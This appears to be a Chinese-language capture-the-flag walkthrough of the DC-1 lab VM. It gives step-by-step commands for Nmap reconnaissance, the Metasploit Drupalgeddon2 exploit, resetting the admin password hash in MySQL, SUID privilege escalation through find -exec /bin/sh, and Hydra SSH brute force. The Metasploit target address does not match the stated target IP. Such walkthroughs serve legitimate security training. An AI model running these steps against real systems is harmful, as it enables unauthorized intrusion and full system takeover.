环境准备

 

DC-1靶机下载地址：https://www.five86.com/dc-1.html

 

虚拟机网络链接模式：桥接模式

 

kali IP 192.168.1.199

 

靶机 IP 192.168.1.248

 

信息收集

 

使用Nmap进行扫描

 

nmap -sP 192.168.1.0/24

 

nmap  -A 192.168.1.248

 

 

浏览器访问192.168.1.248

 

 

 

访问该站点并查看robots.txt敏感文件

192.168.1.248/robots.txt

 

 

 

依次访问robots.txt文件中的敏感文件目录信息，发现UPGRADE.txt文件爆露出版本号

 

 

 

 

漏洞利用

 

寻找drupal 7.X版本漏洞，并进行利用

 

 

 

使用MSF搜索相关模块并进行利用

 

search drupal	//搜索drupal文件

use exploit/unix/webapp/drupal_drupalgeddon2

set RHOST 192.168.0.109

run

shell

python -c "import pty;pty.spawn('/bin/bash')"

 

 

 

 

在网站根目录下发现flag1.txt文件，查看提示寻找站点的配置文件

 

 

Drupal的默认配置文件为/var/www/sites/default/settings.php并查看

 

 

 

根据配置文件提示找到Flag2并发现数据库连接账号密码，根据提示需要提升权限访问敏感文件或者进行爆破账户，在此现在已有信息数据库下手

 

mysql -u dbuser -p //密码R0ck3t

 

 

show databases;

use drupaldb;

show tables;

 

 

select * from user;

select * from users;

 

 

在此我们可以参考官方文档对drupal置换密码，参考链接

站点路径下执行：php scripts/password-hash.sh 新密码

php scripts/password-hash.sh 123456

 

 

use drupaldb

 

update users set pass="$S$DrKHI8kGgiCdo.EMjUOZCBaJvxlGBmEQaQQZVn9OgWeTZGQNrobN" where name="admin";

 

 

 

 

登录网站，搜索发现Flag3,并根据提示需要进行SUID提权

 

 

 

权限提升

 

find / -perm -4000 2>/dev/null

 

 

 

对find命令进行测试并获取root权限

 

touch 666

find / -name 666 -exec "whoami" ;

find / -name 666 -exec "/bin/sh" ;

 

 

 

 

 

 

查找敏感文件/etc/passwd发现存在Flag4用户，并使用hydra进行爆破

 

 

 

ssh flag4@192.168.1.248

 

 

回到root用户家目录发现Flag5